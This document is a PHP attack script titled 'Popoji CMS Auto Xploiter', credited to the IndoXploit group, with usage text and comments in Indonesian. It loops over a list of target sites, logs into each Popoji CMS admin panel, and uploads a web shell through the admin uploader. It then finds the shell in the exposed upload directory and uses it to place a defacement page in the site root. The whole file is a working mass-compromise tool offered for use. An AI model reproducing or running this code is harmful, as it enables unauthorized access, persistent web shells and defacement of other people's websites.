Popoji CMS Auto Xploiter

1. <?php
2. set_time_limit(0);
3. error_reporting(0);
4.  
5. function login($url,$user,$pass) {
6.     $post_login = array(
7.         "mod" => "login",
8.         "act" => "proclogin",
9.         "username" => $user,
10.         "password" => $pass,
11.         );
12.     $ch = curl_init();
13.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
14.           curl_setopt($ch, CURLOPT_URL, $url."/po-admin/login.php");
15.           curl_setopt($ch, CURLOPT_POST, true);
16.           curl_setopt($ch, CURLOPT_POSTFIELDS, $post_login);
17.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
18.           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
19.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
20.           curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
21.           curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
22.           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
23.     return curl_exec($ch);
24.           curl_close($ch);
25. }
26. function ch($url,$post) {
27.     $ch = curl_init($url);
28.     if($post !=null) {
29.           curl_setopt($ch, CURLOPT_POST, true);
30.           curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
31.     }
32.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
33.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
34.           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
35.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
36.           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
37.           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
38.     return curl_exec($ch);
39.           curl_close($ch);
40. }
41. function cek($url) {
42.     $ch = curl_init($url);
43.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
44.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
45.           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
46.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
47.           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
48.           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
49.     return curl_exec ($ch);
50.           curl_close($ch);
51. }
52. function cover() {
53.     echo "<--------------------><-------------------->\n";
54.     echo "[ Popoji CMS Auto Xploiter ]\n";
55.     echo "// Coded by Mr. Error 404 ft. tu5b0l3d - IndoXploit //\n";
56.     echo "cara pake: php popoji.php [list_target.txt] [shell_kalian.jpg] [shell_kalian.php] [file_deface.html]\n";
57.     echo "contoh: php popoji.php target.txt indoxloit.jpg indoxploit.php deface.html\n";
58.     echo "<--------------------><-------------------->\n\n\n";
59. }
60. $username_popoji = "indoxploit"; // ganti dengan username kalian.
61. $password_popoji = "indoxploit"; // ganti dengan paasword kalian.
62. $sites = explode("\n", file_get_contents($argv[1]));
63. $shell = $argv[2];
64. $nama_shell = $argv[3];
65. $deface = $argv[4];
66. $pecah = explode(".", $nama_shell);
67. $nama = $pecah[0];
68. $ext = $pecah[1];
69. if(isset($sites) AND isset($shell) AND isset($nama_shell) AND isset($deface)) {
70.     cover();
71.     foreach($sites as $url) {
72.         echo "[+] Nyecan: $url\n";
73.         $login = login($url, $username_popoji, $password_popoji);
74.         if(preg_match("/beranda|keluar|selamat datang|member|admin/i", $login)) {
75.             echo "[+] Login OK\n";
76.             $post_upload = array(
77.                 "file" => "@$shell",
78.                 "name" => $nama_shell,
79.                 );
80.             ch($url."/po-admin/js/plugins/uploader/upload.php", $post_upload);
81.             $cek_folder = cek("$url/po-content/po-upload/");
82.             if(preg_match("/Index of \/po-content\/po-upload/", $cek_folder) AND !preg_match("/403/", $cek_folder)) {
83.                 preg_match("/<li><a href=\"$nama-(.*?)-polibrary.$ext\">/", $cek_folder, $shellmu);
84.                 $shellmu[1] = "$nama-".$shellmu[1]."-polibrary.$ext";
85.                 $link_shell = $url."/po-content/po-upload/".$shellmu[1];
86.                 echo "[+] Shellmu: $link_shell\n";
87.                 $post_deface = array(
88.                     "tipe_upload" => "home_root",
89.                     "ix_file" => "@$deface",
90.                     "upload" => "upload",
91.                     );
92.                 $depes = ch($link_shell."?do=upload", $post_deface);
93.                 if(preg_match("/uploaded!/i", $depes) AND preg_match("/hacked/i", cek("$url/$deface"))) {
94.                     echo "[+] Sukses Depes! -> $url/$deface\n\n";
95.                 } else {
96.                     echo "[-] Gagal Depes!!\n\n";
97.                 }
98.             } else {
99.                 echo "[+] Lokasi Shellnya forbidden / kena tebas gann :(\n\n";
100.             }
101.         } else {
102.             echo "[+] Login Gagal\n\n";
103.         }
104.     }
105. } else {
106.     echo "cara pake: php ".$argv[0]." [shell_kalian.jpg] [shell_kalian.php] [file_deface.html]\n";
107.     echo "contoh: php ".$argv[0]." shell.jpg indoxploit.php deface.html\n";
108. }
109. ?>